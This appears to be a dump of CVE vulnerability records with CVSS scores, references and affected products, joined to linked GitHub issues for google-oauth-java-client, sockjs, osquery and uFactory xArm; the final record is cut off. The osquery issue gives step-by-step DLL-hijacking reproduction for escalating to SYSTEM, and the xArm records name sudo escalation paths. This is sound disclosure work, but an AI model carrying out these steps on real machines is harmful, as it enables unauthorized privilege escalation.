{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 6.4, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.4, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", "version": "3.1" }, "exploitabilityScore": 2.2, "impactScore": 5.2, "source": "report@snyk.io", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 9.1, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.2, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "report@snyk.io", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/googleapis/google-oauth-java-client/commit/13433cd7dd06267fc261f0b1d4764f8e3432c824" }, { "source": "report@snyk.io", "tags": [ "Third Party Advisory" ], "url": "https://github.com/googleapis/google-oauth-java-client/issues/469" }, { "source": "report@snyk.io", "tags": null, "url": "https://lists.apache.org/thread.html/r3db6ac73e0558d64f0b664f2fa4ef0a865e57c5de20f8321d3b48678%40%3Ccommits.druid.apache.org%3E" }, { "source": "report@snyk.io", "tags": null, "url": "https://lists.apache.org/thread.html/reae8909b264d1103f321b9ce1623c10c1ddc77dba9790247f2c0c90f%40%3Ccommits.druid.apache.org%3E" }, { "source": "report@snyk.io", "tags": [ "Third Party Advisory" ], "url": "https://snyk.io/vuln/SNYK-JAVA-COMGOOGLEOAUTHCLIENT-575276" }, { "source": "report@snyk.io", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://tools.ietf.org/html/rfc7636%23section-1" }, { "source": "report@snyk.io", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://tools.ietf.org/html/rfc8252%23section-8.1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/googleapis/google-oauth-java-client/commit/13433cd7dd06267fc261f0b1d4764f8e3432c824" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/googleapis/google-oauth-java-client/issues/469" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/r3db6ac73e0558d64f0b664f2fa4ef0a865e57c5de20f8321d3b48678%40%3Ccommits.druid.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/reae8909b264d1103f321b9ce1623c10c1ddc77dba9790247f2c0c90f%40%3Ccommits.druid.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://snyk.io/vuln/SNYK-JAVA-COMGOOGLEOAUTHCLIENT-575276" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://tools.ietf.org/html/rfc7636%23section-1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://tools.ietf.org/html/rfc8252%23section-8.1" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:google:oauth_client_library_for_java:*:*:*:*:*:*:*:*", "matchCriteriaId": "5DDA599C-C892-4548-9C70-87191A82F42F", "versionEndExcluding": "1.31.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "863" ]
863
https://github.com/googleapis/google-oauth-java-client/issues/469
[ "Third Party Advisory" ]
github.com
[ "googleapis", "google-oauth-java-client" ]
I've been looking for information about how to enable PKCE when using the AuthorizationCodeFlow but haven't found anything. Am I missing something or is PKCE not supported (out of the box) by this library?
PKCE support?
https://api.github.com/repos/googleapis/google-oauth-java-client/issues/469/comments
7
2020-05-26T17:52:41Z
2021-02-02T01:59:25Z
https://github.com/googleapis/google-oauth-java-client/issues/469
625,071,777
469
1,337
CVE-2020-7693
2020-07-09T14:15:11.197
Incorrect handling of Upgrade header with the value websocket leads in crashing of containers hosting sockjs apps. This affects the package sockjs before 0.3.20.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 1.4, "source": "report@snyk.io", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 1.4, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "report@snyk.io", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/andsnw/sockjs-dos-py" }, { "source": "report@snyk.io", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/sockjs/sockjs-node/commit/dd7e642cd69ee74385825816d30642c43e051d16" }, { "source": "report@snyk.io", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/sockjs/sockjs-node/issues/252" }, { "source": "report@snyk.io", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/sockjs/sockjs-node/pull/265" }, { "source": "report@snyk.io", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-575448" }, { "source": "report@snyk.io", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://snyk.io/vuln/SNYK-JS-SOCKJS-575261" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/andsnw/sockjs-dos-py" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/sockjs/sockjs-node/commit/dd7e642cd69ee74385825816d30642c43e051d16" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/sockjs/sockjs-node/issues/252" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/sockjs/sockjs-node/pull/265" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-575448" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://snyk.io/vuln/SNYK-JS-SOCKJS-575261" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:sockjs_project:sockjs:*:*:*:*:*:node.js:*:*", "matchCriteriaId": "3C576127-F274-4E41-ACA9-24E32CA01599", "versionEndExcluding": "0.3.20", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "755" ]
755
https://github.com/sockjs/sockjs-node/issues/252
[ "Exploit", "Patch", "Third Party Advisory" ]
github.com
[ "sockjs", "sockjs-node" ]
On version 0.3.19 (and I believe in 0.4 also), when issuing upgrade request on wrong URL i.e. `/prefix/wrongpath`, `fake_response` calls `res.end()` in a `try..catch` block and then `res.end()` is being called for the second time in `handle_404` method - which throws...
ERR_STREAM_WRITE_AFTER_END when issuing upgrade request on non-existent URL
https://api.github.com/repos/sockjs/sockjs-node/issues/252/comments
12
2019-02-11T10:19:37Z
2020-03-06T20:41:42Z
https://github.com/sockjs/sockjs-node/issues/252
408,712,412
252
1,338
CVE-2020-11081
2020-07-10T19:15:11.553
osquery before version 4.4.0 enables a privilege escalation vulnerability. If a Window system is configured with a PATH that contains a user-writable directory then a local user may write a zlib1.dll DLL, which osquery will attempt to load. Since osquery runs with elevated privileges this enables local escalation. This is fixed in version 4.4.0.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.4, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:L/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 3.4, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "LOCAL", "availabilityImpact": "NONE", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:C/C:N/I:H/A:N", "version": "3.1" }, "exploitabilityScore": 0.8, "impactScore": 4, "source": "security-advisories@github.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 8.2, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.5, "impactScore": 6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "security-advisories@github.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/osquery/osquery/commit/4d4957f12a6aa0becc9d01d9f97061e1e3d809c5" }, { "source": "security-advisories@github.com", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/osquery/osquery/issues/6426" }, { "source": "security-advisories@github.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/osquery/osquery/pull/6433" }, { "source": "security-advisories@github.com", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/osquery/osquery/releases/tag/4.4.0" }, { "source": "security-advisories@github.com", "tags": [ "Third Party Advisory" ], "url": "https://github.com/osquery/osquery/security/advisories/GHSA-2xwp-8fv7-c5pm" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/osquery/osquery/commit/4d4957f12a6aa0becc9d01d9f97061e1e3d809c5" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/osquery/osquery/issues/6426" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/osquery/osquery/pull/6433" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/osquery/osquery/releases/tag/4.4.0" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/osquery/osquery/security/advisories/GHSA-2xwp-8fv7-c5pm" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:linuxfoundation:osquery:*:*:*:*:*:*:*:*", "matchCriteriaId": "6C2CBEA8-4F6B-429A-BBBC-4E7BA6BF5414", "versionEndExcluding": "4.4.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "426" ]
426
https://github.com/osquery/osquery/issues/6426
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "osquery", "osquery" ]
Hell osquery team, As per facebook security team, they (Teddy) recommended to create issue here. Title Privilege Escalation Bug in Osquery 4.2.0 (windows) via Dll Hijacking Vuln Type Code Execution Product Area Open Source (e.g. HHVM) Description/Impact Complete Details [This should be the longest section. Be as thorough and descriptive as possible.] === [ Vulnerability Type: Privilege Escalation via DLL Preloading DLL: zlib1.dll Affected process: osqueryd.exe Attack Vector: local Description: When osquery service is start, osqueryd.exe process is tries to load the zlib1.dll from user writeable directories and then drop or create malicious dll to writeable folder (C:\python27). Reboot (because of osquery service is auto start after rebooting) or restart the service. Malicious dll "zlib1.dll" will be loaded by that osqueryd.exe . ] Impact [What is the security or privacy risk to Facebook or its users?] === [Privilege escalation: User can executed as NT AUTHORITY\SYSTEM This occurs when an application fails to resolve a DLL because the DLL does not exist in the specified path or search directories. If this happens, a malicious Dll with the same name can be placed in the specified path directory leading to remote code execution as system user. ] Repro Steps Setup === OS: [Tested on Windows x64 1909] Description: [When osquery service is start, osqueryd.exe process is tries to load the zlib1.dll from user writeable directories and then drop or create malicious dll to writeable folder (C:\python27). Reboot (because of osquery service is auto start after rebooting) or restart the service. Malicious dll "zlib1.dll" will be loaded by that osqueryd.exe] Steps [Each step should be 1-2 sentences. Having many steps is fine.] [Ensure each step is clear, concise, and complete] == 1. Filter the processes of osqueryd.exe with procmon (image: osquery1.jpg) ![osquery1](https://user-images.githubusercontent.com/16739401/80823466-b607a900-8c02-11ea-81ed-b15fdc7b91d4.jpg) 2. Create custom payload dll (image: osquery2.jpg) ![osquery2](https://user-images.githubusercontent.com/16739401/80823500-c28c0180-8c02-11ea-9a00-373d566365f3.jpg) 3. Create batch file to execute which include in payload dll (image: osquery3.jpg) ![osquery3](https://user-images.githubusercontent.com/16739401/80823512-c881e280-8c02-11ea-840a-ce6a1b983505.jpg) 4. Then,create or drop payload dll to writable folder C:\python27 (image: osquery4.jpg) ![osquery4](https://user-images.githubusercontent.com/16739401/80823526-cf105a00-8c02-11ea-9876-60ebc0a02bb4.jpg) 5. Check the file that doesn't exist by default (image: osquery5.jpg) ![osquery5](https://user-images.githubusercontent.com/16739401/80823547-db94b280-8c02-11ea-8a2d-53b84cc0ae6b.jpg) 6. Then reboot pc ( It's mean user haven't permission to start service. Reboot since osqueryd service is auto). or restart the service (for testing with admin). After reboot or restart the service, Malicious dll "zlib1.dll" has been loaded and payload will execute. (image: osquery6.jpg) ![osquery6](https://user-images.githubusercontent.com/16739401/80823565-e4858400-8c02-11ea-8e43-6ad95392705e.jpg) 7. payload dll executed as a command "cmd.exe /c C:\temp\exec.bat" and batch file executed "whoami" and print out to C:\osquery_EOP.txt (image: osquery7.jpg) ![osquery7](https://user-images.githubusercontent.com/16739401/80823583-ebac9200-8c02-11ea-9dc5-c98b77d6bb90.jpg I hope you to understand about my details steps. Thanks. With Best, Sai Wynn Myat.
Privilege Escalation Bug in Osquery 4.2.0 (windows) via Dll Search Order Hijacking
https://api.github.com/repos/osquery/osquery/issues/6426/comments
15
2020-05-01T16:55:20Z
2023-01-25T19:21:50Z
https://github.com/osquery/osquery/issues/6426
610,853,126
6,426
1,339
CVE-2020-10285
2020-07-15T21:15:12.193
The authentication implementation on the xArm controller has very low entropy, making it vulnerable to a brute-force attack. There is no mechanism in place to mitigate or lockout automated attempts to gain access.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.4, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:H", "version": "3.0" }, "exploitabilityScore": 3.9, "impactScore": 5.5, "source": "cve@aliasrobotics.com", "type": "Secondary" } ], "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@aliasrobotics.com", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/aliasrobotics/RVD/issues/3322" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/aliasrobotics/RVD/issues/3322" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:ufactory:xarm_5_lite_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "A890A4C3-06E6-4A87-A2D5-D57BFD1CFE9D", "versionEndExcluding": null, "versionEndIncluding": "1.5.0", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:ufactory:xarm_5_lite:-:*:*:*:*:*:*:*", "matchCriteriaId": "0D8D6E40-FA1A-4BC1-BED9-61384D5B700E", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" } ]
[ "331" ]
331
https://github.com/aliasrobotics/RVD/issues/3322
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "aliasrobotics", "RVD" ]
```yaml id: 3322 title: 'RVD#3322: Weak authentication implementation make the system vulnerable to a brute-force attack over adjacent networks' type: vulnerability description: The authentication implementation on the xArm controller has very low entropy, making it vulnerable to a brute-force attack. There is no mechanism in place to mitigate or lockout automated attempts to gain access. cwe: CWE-307 cve: CVE-2020-10285 keywords: - xArm5 Lite, xArm6, xArm7, authentication system: xArm5 Lite v1.5.0 and before, xArm6, xArm7 vendor: uFactory severity: rvss-score: 8.3 rvss-vector: RVSS:1.0/AV:AN/AC:L/PR:N/UI:N/S:U/Y:Z/C:H/I:L/A:H/H:U severity-description: high cvss-score: 8.3 cvss-vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:H links: - https://cwe.mitre.org/data/definitions/307.html - https://github.com/aliasrobotics/RVD/issues/3322 flaw: phase: runtime-operation specificity: general-issue architectural-location: application-specific application: Gentoo Linux subsystem: SSH package: N/A languages: N/A date-detected: 2020-06-18 detected-by: Alfonso Glera (Alias Robotics) detected-by-method: testing-dynamic alutiry:robo_xarm date-reported: '2020-07-15' reported-by: "Victor Mayoral Vilches (Alias Robotics)" reported-by-relationship: null issue: https://github.com/aliasrobotics/RVD/issues/3322 reproducibility: always trace: Not disclosed reproduction: Not disclosed reproduction-image: Not disclosed exploitation: description: Not disclosed exploitation-image: Not disclosed exploitation-vector: Not disclosed exploitation-recipe: '' mitigation: description: Not disclosed pull-request: Not disclosed date-mitigation: null ```
RVD#3322: Weak authentication implementation make the system vulnerable to a brute-force attack over adjacent networks
https://api.github.com/repos/aliasrobotics/RVD/issues/3322/comments
0
2020-07-15T20:55:50Z
2020-07-15T20:57:07Z
https://github.com/aliasrobotics/RVD/issues/3322
657,649,760
3,322
1,340
CVE-2020-10286
2020-07-15T22:15:13.857
the main user account has restricted privileges but is in the sudoers group and there is not any mechanism in place to prevent sudo su or sudo -i to be run gaining unrestricted access to sensible files, encryption, or issue orders that disrupt robot operation.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "ADJACENT_NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:A/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 6.5, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.4, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:H", "version": "3.0" }, "exploitabilityScore": 3.9, "impactScore": 5.5, "source": "cve@aliasrobotics.com", "type": "Secondary" } ], "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@aliasrobotics.com", "tags": [ "Third Party Advisory" ], "url": "https://github.com/aliasrobotics/RVD/issues/3323" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/aliasrobotics/RVD/issues/3323" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:ufactory:xarm_5_lite_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "A890A4C3-06E6-4A87-A2D5-D57BFD1CFE9D", "versionEndExcluding": null, "versionEndIncluding": "1.5.0", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:ufactory:xarm_5_lite:-:*:*:*:*:*:*:*", "matchCriteriaId": "0D8D6E40-FA1A-4BC1-BED9-61384D5B700E", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:ufactory:xarm_6_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "FB8B955D-D0BF-4437-BB9F-E1D312AA0755", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:ufactory:xarm_6:-:*:*:*:*:*:*:*", "matchCriteriaId": "401E4800-639B-4DF9-9E64-1C71653A2367", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:ufactory:xarm_7_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "937407BD-52A5-4930-A7CC-3323DFCDE313", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:ufactory:xarm_7:-:*:*:*:*:*:*:*", "matchCriteriaId": "6B65C0A7-0221-4BBE-A590-B4942137F209", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" } ]
[ "269" ]
269
https://github.com/aliasrobotics/RVD/issues/3323
[ "Third Party Advisory" ]
github.com
[ "aliasrobotics", "RVD" ]
```yaml id: 3323 title: 'RVD#3323: Mismanaged permission implementation leads to privilege escalation, exfiltration of sensitive information, and DoS' type: vulnerability description: "the main user account has restricted privileges but is in the sudoers group and there is not any mechanism in place to prevent sudo su or sudo -i to be run gaining unrestricted access to sensible files, encryption, or issue orders that disrupt robot operation." cwe: CWE-656 cve: CVE-2020-10286 keywords: - xArm5 Lite, xArm6, xArm7, permissions system: xArm5 Lite v1.5.0 and before, xArm6, xArm7 vendor: uFactory severity: rvss-score: 8.3 rvss-vector: RVSS:1.0/AV:AN/AC:L/PR:N/UI:N/S:U/Y:Z/C:H/I:L/A:H/H:U severity-description: high cvss-score: 8.3 cvss-vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:H links: - https://cwe.mitre.org/data/definitions/269.html - https://github.com/aliasrobotics/RVD/issues/3323 flaw: phase: runtime-operation specificity: general-issue architectural-location: application-specific application: Gentoo Linux subsystem: N/A package: N/A languages: N/A date-detected: 2020-06-18 detected-by: Alfonso Glera (Alias Robotics) detected-by-method: testing-dynamic alurity:robo_xarm date-reported: '2020-07-15' reported-by: "Victor Mayoral Vilches" reported-by-relationship: security researcher issue: https://github.com/aliasrobotics/RVD/issues/3323 reproducibility: always trace: Not disclosed reproduction: Not disclosed reproduction-image: Not disclosed exploitation: description: Not disclosed exploitation-image: Not disclosed exploitation-vector: Not disclosed exploitation-recipe: '' mitigation: description: Not disclosed pull-request: Not disclosed date-mitigation: null ```
RVD#3323: Mismanaged permission implementation leads to privilege escalation, exfiltration of sensitive information, and DoS
https://api.github.com/repos/aliasrobotics/RVD/issues/3323/comments
0
2020-07-15T21:06:12Z
2020-07-15T21:09:16Z
https://github.com/aliasrobotics/RVD/issues/3323
657,656,985
3,323
1,341
CVE-2020-10287
2020-07-15T23:15:11.283
The IRC5 family with UAS service enabled comes by default with credentials that can be found on publicly available manuals. ABB considers this a well documented functionality that helps customer set up however, out of our research, we found multiple production systems running these exact default credentials and consider thereby this an exposure that should be mitigated. Moreover, future deployments should consider that these defaults should be forbidden (user should be forced to change them).
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.1, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H", "version": "3.0" }, "exploitabilityScore": 3.9, "impactScore": 5.2, "source": "cve@aliasrobotics.com", "type": "Secondary" } ], "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": 